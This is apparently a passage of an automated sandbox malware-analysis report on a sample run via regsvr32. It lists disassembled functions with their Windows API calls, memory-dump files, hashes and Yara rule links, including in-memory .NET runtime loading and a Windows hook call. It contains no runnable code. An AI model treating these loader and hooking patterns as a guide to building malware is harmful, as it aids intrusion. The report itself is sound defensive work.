HeapFree.KERNEL32 ref: 00007FF8A934A94F
HeapFree.KERNEL32 ref: 00007FF8A934A969
CloseHandle.KERNEL32 ref: 00007FF8A934AA17
CloseHandle.KERNEL32 ref: 00007FF8A934AAB3
WaitForSingleObject.KERNEL32 ref: 00007FF8A934AE7E
GetLastError.KERNEL32 ref: 00007FF8A934AE87
HeapFree.KERNEL32 ref: 00007FF8A934AEA9
HeapFree.KERNEL32 ref: 00007FF8A934AECC
CloseHandle.KERNEL32 ref: 00007FF8A934AF2C
CloseHandle.KERNEL32 ref: 00007FF8A934AF35

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseFreeHandleHeap$ErrorLastObjectSingleWait
String ID:
API String ID: 3984667017-0
Opcode ID: 0283a4135becd2feb7365369f589644439a9485a2e6ce45569da4ce2485d9264
Instruction ID: 9c4c4087da006db93ad2b98f38703e7b151804b53b8abbe02f90c758e9d8060f
Opcode Fuzzy Hash: 0283a4135becd2feb7365369f589644439a9485a2e6ce45569da4ce2485d9264
Instruction Fuzzy Hash: 1C512C22A0EFC1A8E7609F61D8543F923A1FB887C8F056135EE4D8BA99DF38D185C340

Function 00007FF8A934A030 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF8A934A1D8
memcpy.MSVCRT ref: 00007FF8A934A1EB
memcpy.MSVCRT ref: 00007FF8A934A202
memcpy.MSVCRT ref: 00007FF8A934A21B
memcpy.MSVCRT ref: 00007FF8A934A25C
memcpy.MSVCRT ref: 00007FF8A934A277

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF8A934B002, 00007FF8A934B036, 00007FF8A934B06A
assertion failed: old_left_len + count <= CAPACITY, xrefs: 00007FF8A934A442

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: old_left_len + count <= CAPACITY$called `Result::unwrap()` on an `Err` value
API String ID: 3510742995-3830370267
Opcode ID: e3b527eafe33025758db7741472c57905f51d41c3744399735a7fe8a0eb27357
Instruction ID: ab36542c105a747523b3e5f04d2e80f6c24d851f038d7eee01db755ef30460e9
Opcode Fuzzy Hash: e3b527eafe33025758db7741472c57905f51d41c3744399735a7fe8a0eb27357
Instruction Fuzzy Hash: C5C1E362A19FC492EA458F18E4053FA6774FB98BD8F46A336DE4D53361DF38A295C300

Function 00007FF8A933AD60 Relevance: 12.2, APIs: 8, Instructions: 177
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF8A933B0D0: HeapFree.KERNEL32 ref: 00007FF8A933B1F8

CreateFileW.KERNEL32 ref: 00007FF8A933AEE8
GetLastError.KERNEL32 ref: 00007FF8A933AF04
SetFileInformationByHandle.KERNEL32 ref: 00007FF8A933AF2D
HeapFree.KERNEL32 ref: 00007FF8A933AF4A
GetLastError.KERNEL32 ref: 00007FF8A933AF59
HeapFree.KERNEL32 ref: 00007FF8A933AF85
GetLastError.KERNEL32 ref: 00007FF8A933AF9E
CloseHandle.KERNEL32 ref: 00007FF8A933AFB0

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorFreeHeapLast$FileHandle$CloseCreateInformation
String ID:
API String ID: 2929975209-0
Opcode ID: bf0755fff651767cf1758b4d0d115d4b57a12b3911173819cc5caea59d121a5b
Instruction ID: 19b22f205de407be0314082760c83afd3414c86ac1c93678dafca07ba64725d4
Opcode Fuzzy Hash: bf0755fff651767cf1758b4d0d115d4b57a12b3911173819cc5caea59d121a5b
Instruction Fuzzy Hash: 7261AB61A4EAD2AAFB608E6195503BB37B1EF457C4F046138DE4DC7AC5DF2DE8A58300

Function 00007FF8A934A980 Relevance: 12.1, APIs: 8, Instructions: 105
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FF8A934AA17
CloseHandle.KERNEL32 ref: 00007FF8A934AAB3
WaitForSingleObject.KERNEL32 ref: 00007FF8A934AE7E
GetLastError.KERNEL32 ref: 00007FF8A934AE87
HeapFree.KERNEL32 ref: 00007FF8A934AEA9
HeapFree.KERNEL32 ref: 00007FF8A934AECC
CloseHandle.KERNEL32 ref: 00007FF8A934AF2C
CloseHandle.KERNEL32 ref: 00007FF8A934AF35
GetLastError.KERNEL32 ref: 00007FF8A934AF8E

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$ErrorFreeHeapLast$ObjectSingleWait
String ID:
API String ID: 908592504-0
Opcode ID: 7ca30f4d0e87251ee3208c063649d60706380cd71cdd1fff159d1b938df2f73b
Instruction ID: c26f8d6d1d6526cab5dcc659fabfe5d4e190736f4a6494136546ac18c3b503d1
Opcode Fuzzy Hash: 7ca30f4d0e87251ee3208c063649d60706380cd71cdd1fff159d1b938df2f73b
Instruction Fuzzy Hash: A2411A22A0AFC1A8E7619F61D8503E933A0FB847D8F056535EE4D8BA99DF78D1C5C340

Function 00007FF8A934B250 Relevance: 10.1, APIs: 8, Instructions: 117
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF8A934B2B6
GetLastError.KERNEL32 ref: 00007FF8A934B321
CloseHandle.KERNEL32 ref: 00007FF8A934B37A
CloseHandle.KERNEL32 ref: 00007FF8A934B383
HeapFree.KERNEL32 ref: 00007FF8A934B3E0
CloseHandle.KERNEL32 ref: 00007FF8A934B3F1
CloseHandle.KERNEL32 ref: 00007FF8A934B3FA
HeapFree.KERNEL32 ref: 00007FF8A934B40C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$ErrorFreeHeapLast
String ID:
API String ID: 2056089037-0
Opcode ID: 7cc5e5206444c032cad7c63e4a0b720ec1d163a654cee290d0c39fcc05128369
Instruction ID: d255f808d8c79b6ce303850b1e16b20b07958acaed1349d700dd45f568cc4213
Opcode Fuzzy Hash: 7cc5e5206444c032cad7c63e4a0b720ec1d163a654cee290d0c39fcc05128369
Instruction Fuzzy Hash: 92417F22A0EF81A5EA249F62D5113BD76B0EF88BC0F05A432DE4E87796DF7CE5418300

Function 026F0C34 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 026F0D02

Strings

l, xrefs: 026F0C9C

Memory Dump Source

Source File: 00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26e0000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction ID: a16e9988cefc54a5f7daecabd78e72426e13eb12c33895e04657e4e286eeb1a6
Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction Fuzzy Hash: 0031B12051CA898FDB99EB2CC044B26BBD5FB9A308F2456BCC5DEC725BD734D44A8705

Function 026EF1A8 Relevance: 3.3, APIs: 2, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 026EF1F4
SafeArrayCreate.OLEAUT32 ref: 026EF382

Memory Dump Source

Source File: 00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26e0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Create$ArrayInstanceSafe
String ID:
API String ID: 3625591093-0
Opcode ID: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction ID: 1072becc0737f3202ea4969d0e76332f5467509407a64cd66ace3626b64ff8ec
Opcode Fuzzy Hash: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction Fuzzy Hash: 0B818C31219A488FCB68EF28C889AE6B7E1FF99305F10466DD49BC7555EB30E505CBC2

Function 00007FF8A934B420 Relevance: 3.1, APIs: 2, Instructions: 103
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00007FF8A934B498
GetLastError.KERNEL32 ref: 00007FF8A934B4BB

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: cf86975247f2381394c3fa81f86474c0d37b8e7bdd7153a08527b21d0506428a
Instruction ID: 71d96bc2262ff3258630dbbd6d06a40f9b067d7f0116066b4dc611f88bd69dec
Opcode Fuzzy Hash: cf86975247f2381394c3fa81f86474c0d37b8e7bdd7153a08527b21d0506428a
Instruction Fuzzy Hash: 80413762B0EE81A9EB248E25D5503BD22B1EB84BD4F15A435DE5D87B89DF3CE8508340

Function 00007FF8A933E2B0 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32 ref: 00007FF8A933E2D7
GetLastError.KERNEL32 ref: 00007FF8A933E2EC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b1f44e8819db8b87d30af694dc40238e1f93fb849b5f7140a6fd6c4f7c2f9852
Instruction ID: 764adf1246ef63971147abb7f70aa6f4748c68af3474d0cdcda4ec399c8ad3f7
Opcode Fuzzy Hash: b1f44e8819db8b87d30af694dc40238e1f93fb849b5f7140a6fd6c4f7c2f9852
Instruction Fuzzy Hash: 66E065A5F15A81AAFB109BB194023E923B5DB4C7D4F845071DD4C97749DE3CD1D1C650

Function 00007FF8A931BB00 Relevance: 2.7, APIs: 2, Instructions: 246
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapFree.KERNEL32 ref: 00007FF8A931BDA2
HeapFree.KERNEL32 ref: 00007FF8A931BDB3

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 417ccfcdd6d392e1ab4ea9851aa90fde86949172939e584f5e8103bc3f7b4771
Instruction ID: bb888c0192c694fffb09ced815064418330c56aecb36ce294388088ae3067197
Opcode Fuzzy Hash: 417ccfcdd6d392e1ab4ea9851aa90fde86949172939e584f5e8103bc3f7b4771
Instruction Fuzzy Hash: 3A819112A0FEC661FE199F16A9003B966B1EF45BD0F69A431DE0DC77D5EE3CE5868200

Function 00007FF8A93015B0 Relevance: 2.6, APIs: 2, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapFree.KERNEL32 ref: 00007FF8A93015DD
HeapFree.KERNEL32 ref: 00007FF8A9301616

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0b853bdaefb4d720e9f06f81a784c19d3d437c2ce9e35980e5b6461c92e7911d
Instruction ID: a017c865344884461eab3f90101518bc63952c6af6eed87fd70d8d3e406147e7
Opcode Fuzzy Hash: 0b853bdaefb4d720e9f06f81a784c19d3d437c2ce9e35980e5b6461c92e7911d
Instruction Fuzzy Hash: F6116056F0FA8591FE199F6A94903B91271DF88FD4F286471CE0E87790DE2ED8879300

Function 00007FF8A931BB85 Relevance: 2.6, APIs: 2, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9402d9edf19d02522d5073df4f2a608842c9409e550e4dcaab2d9f77ed48b155
Instruction ID: ba825678baaf0c7e3a3dd1ae2c13d61583311f5e252eadcb0b1dadf729a18114
Opcode Fuzzy Hash: 9402d9edf19d02522d5073df4f2a608842c9409e550e4dcaab2d9f77ed48b155
Instruction Fuzzy Hash: 8B119012B0FD85A1FE19DF16A4153B953B1EF49BD4F98A531DA0D87BA9EE3CE181C200

Function 00007FF8A931BB2E Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A931BB3A
HeapFree.KERNEL32 ref: 00007FF8A931BB4B
HeapFree.KERNEL32 ref: 00007FF8A931BDA2
HeapFree.KERNEL32 ref: 00007FF8A931BDB3

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b4602efac24d704e8efb498bf7dc1e82a986760c77fb9d81fdcbdcdf967e2786
Instruction ID: 8daf1469e7c5045bd47f6ed4d26941fa2f1a7e84692cf909779015f6a961449b
Opcode Fuzzy Hash: b4602efac24d704e8efb498bf7dc1e82a986760c77fb9d81fdcbdcdf967e2786
Instruction Fuzzy Hash: CDE06D50E0FEC661FD04EF1694552B953B2EF89BC4B49A531CA0DCA296DE3EE1108200

Function 00007FF848A82F0D Relevance: 1.6, APIs: 1, Instructions: 150COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32 ref: 00007FF848A82FE1

Memory Dump Source

Source File: 00000006.00000002.3246514372.00007FF848A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848a80000_regsvr32.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: f5d65c09881db4579619d6b6490f884f190145bfeabf88971af2c7efdbb51f40
Instruction ID: f4f2c787fc8723a6235566d89cff89c3f0f094bdc5df851751a3c2c232507e3e
Opcode Fuzzy Hash: f5d65c09881db4579619d6b6490f884f190145bfeabf88971af2c7efdbb51f40
Instruction Fuzzy Hash: 9241273190DA5C5FD708EF68D8066F97BE1EF9A320F04427FE049C3292CA64A816CBD1

Function 00007FF8A933E298 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9354020: RtlCaptureContext.NTDLL ref: 00007FF8A93540B2
Part of subcall function 00007FF8A9354020: RtlUnwindEx.KERNEL32 ref: 00007FF8A93540EF
Part of subcall function 00007FF8A9354020: abort.MSVCRT ref: 00007FF8A93540F5
Part of subcall function 00007FF8A9354020: RaiseException.KERNEL32 ref: 00007FF8A9354132

SetFilePointerEx.KERNEL32 ref: 00007FF8A933E2D7
GetLastError.KERNEL32 ref: 00007FF8A933E2EC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CaptureContextErrorExceptionFileLastPointerRaiseUnwindabort
String ID:
API String ID: 664057041-0
Opcode ID: 7751caa53c6dff08779281aebcc5d661854e2524dc5eb2e1268a2889e7a13479
Instruction ID: d233f93173e24898178b543fa93cd0f250ab71ed8c9418c2b89b0701cd12748b
Opcode Fuzzy Hash: 7751caa53c6dff08779281aebcc5d661854e2524dc5eb2e1268a2889e7a13479
Instruction Fuzzy Hash: 01F08255A1EBC16AE7019F6194053E92FB0DB49B84F8950A2DE0C93746CE3CC144C311

Function 00007FF8A931A380 Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A931A448

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 796e56474611e10859ca3eed8a75b59cacb60af6d4c730d117d832b186b9e6ac
Instruction ID: 8b51151f6c09034fe99bd82d9bf2dbf9b7ed0a516f788be687e873815ad821a0
Opcode Fuzzy Hash: 796e56474611e10859ca3eed8a75b59cacb60af6d4c730d117d832b186b9e6ac
Instruction Fuzzy Hash: 5721D462B59AC6A1ED24CF0AE9086A9A731FF45BD4F589032DE4D97765EE3CE141C300

